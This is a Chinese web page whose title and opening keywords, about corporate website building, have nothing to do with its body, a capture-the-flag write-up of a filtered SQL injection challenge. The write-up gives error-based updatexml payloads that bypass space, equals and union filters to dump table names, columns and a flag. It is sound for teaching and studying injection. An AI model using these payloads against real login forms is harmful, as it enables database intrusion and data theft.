企业官网建设流程全解析

信息手机网站模板下载软件,网站平台建设策划,大理州建设局网站门户网,给企业做网站的平台1、解题思路 开局是一个登录框#xff0c;并且题目已经明示了是一个困难sql#xff0c;那我们就在用户框输入’测试发现报错#xff0c;猜测可能是报错注入 然后后面加上#显示字符#xff0c;那就说明存在sql注入且闭合方式为单引号 然后我们在这个单引号和#之间输入空格…1、解题思路开局是一个登录框并且题目已经明示了是一个困难sql那我们就在用户框输入’测试发现报错猜测可能是报错注入然后后面加上#显示字符那就说明存在sql注入且闭合方式为单引号然后我们在这个单引号和#之间输入空格和一些关键函数可以大概知道过滤哪些然后我们测试发现大概过滤了空格,等号,unino(显示以下内容代表被过滤了好的我们知道了以上信息那我们接下来就是可以用报错函数来进行注入查看当前数据库payloadusername1’or(updatexml(1,concat(0x7e,database(),0x7e),1))#password1可以看到当前数据库名为geekPs:由于目标过滤了空格所以我们要把报错函数包起来然后我们就是查看表名payload1or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#查看字段payload1or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))#查看字段值payload1or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))#但是查看这个flag值似乎是不完整的使用right查询右边部分的payload1or(updatexml(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)),0x7e),1))#随后我们拼接就可以得到完整flag2、涉及知识点1、updatexml函数的报错信息存在默认长度限制—— 其返回的错误内容最多只能显示32 个字符2、right 函数字符串右侧截取——right(str, len)3、UPDATEXML(XML_document, XPath_string, new_value)XML_document必填要修改的 XML 文档注入中无需真实 XML填任意值如1、0即可仅为满足语法XPath_string必填XPath 路径表达式核心注入点必须是 “合法 XPath 格式”否则触发语法错误new_value必填替换节点的新值注入中填任意值如1即可无实际作用4、其他报错函数extractvalue(),floor(),exp()等等5、sql绕过